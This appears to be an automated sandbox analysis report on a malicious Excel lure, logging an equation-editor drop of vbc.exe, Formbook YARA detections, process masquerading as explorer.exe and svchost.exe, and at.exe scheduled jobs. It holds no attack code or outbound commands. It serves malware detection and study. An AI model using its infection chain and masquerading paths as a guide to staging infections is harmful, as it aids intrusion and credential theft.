Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\system\explorer.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\system\explorer.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\system\svchost.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\system\svchost.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\system\spoolsv.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\at.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D906B NtWriteVirtualMemory,LoadLibraryA,		5_2_003D906B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D99F7 NtProtectVirtualMemory,		5_2_003D99F7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D404F NtWriteVirtualMemory,		5_2_003D404F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3C4F NtWriteVirtualMemory,		5_2_003D3C4F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3C94 NtWriteVirtualMemory,		5_2_003D3C94
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3CD3 NtWriteVirtualMemory,		5_2_003D3CD3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3911 NtWriteVirtualMemory,		5_2_003D3911
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3166 NtWriteVirtualMemory,LoadLibraryA,		5_2_003D3166
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D395B NtWriteVirtualMemory,		5_2_003D395B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3D4D NtWriteVirtualMemory,		5_2_003D3D4D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3DEF NtWriteVirtualMemory,		5_2_003D3DEF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D39C3 NtWriteVirtualMemory,		5_2_003D39C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A38 NtWriteVirtualMemory,		5_2_003D3A38
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D9A29 NtProtectVirtualMemory,		5_2_003D9A29
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A05 NtWriteVirtualMemory,		5_2_003D3A05
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3E5F NtWriteVirtualMemory,		5_2_003D3E5F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A51 NtWriteVirtualMemory,		5_2_003D3A51
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3EAF NtWriteVirtualMemory,		5_2_003D3EAF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3A9B NtWriteVirtualMemory,		5_2_003D3A9B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3AE7 NtWriteVirtualMemory,		5_2_003D3AE7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3F07 NtWriteVirtualMemory,		5_2_003D3F07
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3B57 NtWriteVirtualMemory,		5_2_003D3B57
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3B88 NtWriteVirtualMemory,		5_2_003D3B88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3F88 NtWriteVirtualMemory,		5_2_003D3F88
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3BE9 NtWriteVirtualMemory,		5_2_003D3BE9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003D3FC8 NtWriteVirtualMemory,		5_2_003D3FC8
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E11E10 NtReadFile,		8_2_03E11E10
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E11D60 NtCreateFile,		8_2_03E11D60
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FEA0 NtReadVirtualMemory,LdrInitializeThunk,		18_2_1EB1FEA0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		18_2_1EB1FED0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FFB4 NtCreateSection,LdrInitializeThunk,		18_2_1EB1FFB4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FF34 NtQueueApcThread,LdrInitializeThunk,		18_2_1EB1FF34
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC90 NtUnmapViewOfSection,LdrInitializeThunk,		18_2_1EB1FC90
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC60 NtMapViewOfSection,LdrInitializeThunk,		18_2_1EB1FC60
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB21D80 NtSuspendThread,LdrInitializeThunk,		18_2_1EB21D80
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FD8C NtDelayExecution,LdrInitializeThunk,		18_2_1EB1FD8C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FDC0 NtQuerySystemInformation,LdrInitializeThunk,		18_2_1EB1FDC0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FAE8 NtQueryInformationProcess,LdrInitializeThunk,		18_2_1EB1FAE8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		18_2_1EB1FAD0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FBB8 NtQueryInformationToken,LdrInitializeThunk,		18_2_1EB1FBB8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FB68 NtFreeVirtualMemory,LdrInitializeThunk,		18_2_1EB1FB68
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB21930 NtSetContextThread,LdrInitializeThunk,		18_2_1EB21930
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F900 NtReadFile,LdrInitializeThunk,		18_2_1EB1F900
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB200C4 NtCreateFile,LdrInitializeThunk,		18_2_1EB200C4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20078 NtResumeThread,LdrInitializeThunk,		18_2_1EB20078
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20048 NtProtectVirtualMemory,LdrInitializeThunk,		18_2_1EB20048
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FE24 NtWriteVirtualMemory,		18_2_1EB1FE24
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FFFC NtCreateProcessEx,		18_2_1EB1FFFC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC30 NtOpenProcess,		18_2_1EB1FC30
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20C40 NtGetContextThread,		18_2_1EB20C40
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FC48 NtSetInformationFile,		18_2_1EB1FC48
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FD5C NtEnumerateKey,		18_2_1EB1FD5C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FAB8 NtQueryValueKey,		18_2_1EB1FAB8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FA20 NtQueryInformationFile,		18_2_1EB1FA20
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FA50 NtEnumerateValueKey,		18_2_1EB1FA50
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FBE8 NtQueryVirtualMemory,		18_2_1EB1FBE8
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1FB50 NtCreateKey,		18_2_1EB1FB50
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F8CC NtWaitForSingleObject,		18_2_1EB1F8CC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F9F0 NtClose,		18_2_1EB1F9F0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB1F938 NtWriteFile,		18_2_1EB1F938
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB207AC NtCreateMutant,		18_2_1EB207AC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB210D0 NtOpenProcessToken,		18_2_1EB210D0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB20060 NtQuerySection,		18_2_1EB20060
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB201D4 NtSetValueKey,		18_2_1EB201D4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2010C NtOpenDirectoryObject,		18_2_1EB2010C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB21148 NtOpenThread,		18_2_1EB21148
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B99F7 NtProtectVirtualMemory,		18_2_001B99F7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9F5D NtQueryInformationProcess,		18_2_001B9F5D
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA020 NtQueryInformationProcess,		18_2_001BA020
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA055 NtQueryInformationProcess,		18_2_001BA055
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA0A4 NtQueryInformationProcess,		18_2_001BA0A4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA113 NtQueryInformationProcess,		18_2_001BA113
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA14B NtQueryInformationProcess,		18_2_001BA14B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA189 NtQueryInformationProcess,		18_2_001BA189
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA1C3 NtQueryInformationProcess,		18_2_001BA1C3
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA1F4 NtQueryInformationProcess,		18_2_001BA1F4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA234 NtQueryInformationProcess,		18_2_001BA234
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9A29 NtProtectVirtualMemory,		18_2_001B9A29
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA27F NtQueryInformationProcess,		18_2_001BA27F
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA321 NtQueryInformationProcess,		18_2_001BA321
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA363 NtQueryInformationProcess,		18_2_001BA363
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001BA3D3 NtQueryInformationProcess,		18_2_001BA3D3
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9EB9 NtProtectVirtualMemory,		18_2_001B9EB9
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9F63 NtQueryInformationProcess,		18_2_001B9F63
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9FAF NtQueryInformationProcess,		18_2_001B9FAF
Source: C:\Users\Public\vbc.exe	Code function: 18_2_001B9FE8 NtQueryInformationProcess,		18_2_001B9FE8

Creates files inside the system directory

Source: C:\Users\user\AppData\Local\icsys.icn.exe

File created: c:\windows\system\explorer.exe

Jump to behavior

Deletes files inside the Windows folder

Source: C:\Users\user\AppData\Local\icsys.icn.exe

File deleted: C:\Windows\system\explorer.exe

Jump to behavior

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041F830		4_2_0041F830
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00416130		4_2_00416130
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00422F50		4_2_00422F50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401A5C		5_2_00401A5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401AAC		5_2_00401AAC
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E14FA3		8_2_03E14FA3
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03DFAFB0		8_2_03DFAFB0
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E01E40		8_2_03E01E40
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E01E3B		8_2_03E01E3B
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03DFAD90		8_2_03DFAD90
Source: C:\Windows\system\explorer.exe	Code function: 8_2_03E165BA		8_2_03E165BA
Source: C:\Windows\system\svchost.exe	Code function: 10_2_005E6DC1		10_2_005E6DC1
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB4EE4C		18_2_1EB4EE4C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB40F3F		18_2_1EB40F3F
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBCFDDD		18_2_1EBCFDDD
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB60D3B		18_2_1EB60D3B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3CD5B		18_2_1EB3CD5B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBE3A83		18_2_1EBE3A83
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBDCBA4		18_2_1EBDCBA4
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBBDBDA		18_2_1EBBDBDA
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2FBD7		18_2_1EB2FBD7
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBCF8EE		18_2_1EBCF8EE
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB5286D		18_2_1EB5286D
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3C85C		18_2_1EB3C85C
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB329B2		18_2_1EB329B2
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBD098E		18_2_1EBD098E
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB469FE		18_2_1EB469FE
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBB5955		18_2_1EBB5955
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB34680		18_2_1EB34680
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3E6C1		18_2_1EB3E6C1
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBD2622		18_2_1EBD2622
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3C7BC		18_2_1EB3C7BC
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBB579A		18_2_1EBB579A
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB65485		18_2_1EB65485
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB41489		18_2_1EB41489
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB4C5F0		18_2_1EB4C5F0
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB3351F		18_2_1EB3351F
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2E2E9		18_2_1EB2E2E9
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EBD1238		18_2_1EBD1238
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB563DB		18_2_1EB563DB
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2F3CF		18_2_1EB2F3CF
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB32305		18_2_1EB32305
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB7A37B		18_2_1EB7A37B
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB37353		18_2_1EB37353
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB2E0C6		18_2_1EB2E0C6
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB4905A		18_2_1EB4905A
Source: C:\Users\Public\vbc.exe	Code function: 18_2_1EB33040		18_2_1EB33040

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Required Order Quantity.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB73F92 appears 99 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB7373B appears 237 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB2E2A8 appears 34 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB2DF5C appears 100 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 1EB9F970 appears 77 times

PE file contains strange resources

Source: vbc.exe .4.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\system\svchost.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: winsta.dll			Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: davhlpr.dll			Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: cscapi.dll			Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: browcli.dll			Jump to behavior

Yara signature match

Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Binary contains paths to development resources

Source: vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	Binary or memory string: .VBPud<_
Source: vbc.exe, icsys.icn.exe, 00000007.00000000.2177137103.0000000000401000.00000020.00020000.sdmp, explorer.exe, 00000008.00000002.2236234855.0000000000401000.00000020.00020000.sdmp, spoolsv.exe, 00000009.00000002.2183386530.0000000000401000.00000020.00020000.sdmp	Binary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
Source: explorer.exe, 00000008.00000002.2236452460.000000000042C000.00000004.00020000.sdmp	Binary or memory string: `P@*\AD:\Code\Explorer\Explorer.vbp
Source: vbc.exe, 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp, icsys.icn.exe, 00000007.00000002.2183922117.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000009.00000002.2183447253.000000000042C000.00000004.00020000.sdmp	Binary or memory string: r`P@*\AD:\Code\Explorer\Explorer.vbp

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@170/31@12/5

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Required Order Quantity.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREAAC.tmp

Jump to behavior

Found command line output

Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3;.....(.P.....................d.......y.......................................................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.....................'.....B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3......(.P.....<.......t.......................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3:.....(.P.....0.......................L.................................................................$.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1...................x.......B.................$.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3E.....(.P.....8.........................................................................................0.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.....................+.....B.................0.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................33.....(.P.....................................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................38.....(.P.....................$...............................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...........H.......B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3).....(.P.....................................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3......(.P.............................1.......................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0.............).....B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3-.....(.P.............4...............".......................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3>.....(.P.............\...............1.......................0...W.O...................................,.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...........(.......B.................,.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3%.....(.P.....................................................................................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1...........................B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3-.....(.P.............P.......................................0...W.O.........................................
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .1.......0...........(.......B.......................
Source: C:\Windows\SysWOW64\at.exe	Console Write: .................................3>.....(.P.....................................................0...W.O...................................,.....
Source: C:\Windows\SysWOW64\at.exe	Console Write: ................................A.d.d.e.d. .a. .n.e.w. .j.o.b. .w.i.t.h. .j.o.b. .I.D. .=. .2.......0...........H.......B.................,.....

Launches a second explorer.exe instance

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\system\explorer.exe			Jump to behavior

Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Windows\system\explorer.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Windows\system\svchost.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Windows\system\spoolsv.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
